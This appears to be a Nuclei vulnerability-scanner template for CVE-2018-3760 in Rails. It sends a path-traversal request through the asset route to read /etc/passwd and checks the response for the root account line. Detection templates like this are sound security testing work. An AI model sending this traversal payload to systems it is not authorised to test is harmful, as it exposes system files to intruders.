nuclei-templates/cves/CVE-2018-3760.yaml

20 lines
331 B
YAML

id: cve-2018-3760
info:
name: Rails cve-2018-3760
author: 0xrudra
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body